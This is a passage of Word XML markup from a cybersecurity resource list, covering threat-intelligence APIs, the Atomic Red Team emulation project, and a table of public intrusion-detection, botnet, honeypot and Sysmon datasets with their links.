    <w:p w14:paraId="74EC3F9D" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="7F3A8F70">
          <v:rect id="_x0000_i1388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="265156C2" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Threat Intelligence Integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A1989" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> API (IP reputation)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https://www.abuseipdb.com/api.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C325410" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>AlienVault OTX (Open Threat Exchange)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https://otx.alienvault.com/api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CFEBF7" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="049DAD6F">
          <v:rect id="_x0000_i1389" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C29D7" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulation &amp; Attack Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FDDF0B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Atomic Red Team (ATT&amp;CK Technique Emulation Scripts)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15" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink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https://atomicredteam.io/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13627CD8" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="3013249C">
          <v:rect id="_x0000_i1390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C27C3" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Public Datasets &amp; Log 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1625"/>
        <w:gridCol w:w="1678"/>
        <w:gridCol w:w="5424"/>
      </w:tblGrid>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="2571A2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2DA6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004816BF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3D9E990" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dataset / Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E1EBE3" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004816B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B23549B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="2BCED4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E91E" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C1CD30" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CIC IDS 2017 / 2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E96122" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve">Realistic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>labeled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve"> network attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B40461F" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId116" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.unb.ca/cic/datasets/ids-2017.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="4AB22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A59E4" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E74D9B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>LANL Cybersecurity Datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5598FB9D" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Auth &amp; event logs from enterprise network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68F99ABD" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>https://csr.lanl.gov/data/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="2738EB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DDE5" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F4D7860" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CTU-13 Botnet Dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0FE113" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve">13 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>labeled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve"> botnet scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E3A8CCF" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>https://www.stratosphereips.org/datasets-ctu13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="08C01C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00CC8" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E728B9" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UNSW-NB15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401239C4" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Academic dataset with 9 attack categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="163EF816" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId117" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://research.unsw.edu.au/projects/unsw-nb15-dataset</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="55F4CC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BFFDC" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="606374FC" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MAWI Working Group Archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628BCE1F" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Real backbone network traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="286F6EA7" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId118" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://mawi.wide.ad.jp/mawi/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="74FD6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39D01" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF"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5BEB0A40" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CAIDA Anonymized Traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F51FC0" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Internet-scale PCAPs &amp; DDoS traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70CFF52B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>https://www.caida.org/catalog/datasets/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="715BBE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68578" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BAB12A6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cowrie Honeypot Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF76423" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>SSH/Telnet attack session logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69C97A0A" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId119" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://github.com/cowrie/cowrie</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve"> / https://www.kaggle.com/datasets/greysky/cowrie-honeypot-log-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="100E01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6F28E" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E418EA" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sysmon (System Monitor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D9C8EFD" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Windows event monitoring tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2672C6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId120" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="58507F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1EC1C" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55DBA013" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon Config by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SwiftOnSecurity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8D1B1" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Hardened config for Sysmon logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B15682" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId121" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://github.com/SwiftOnSecurity/sysmon-config</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="0AA6A4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B6679" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D706A6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Splunk Attack Data Repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C26EE37" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>Labeled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve"> Sysmon/ATT&amp;CK samples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C8D7AA3" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId122" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://github.com/splunk/attack_data</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="477EE8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10CE6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B889C88" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Elastic Sample Data (Kibana)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42EA0A76" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Demo datasets for dashboard testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
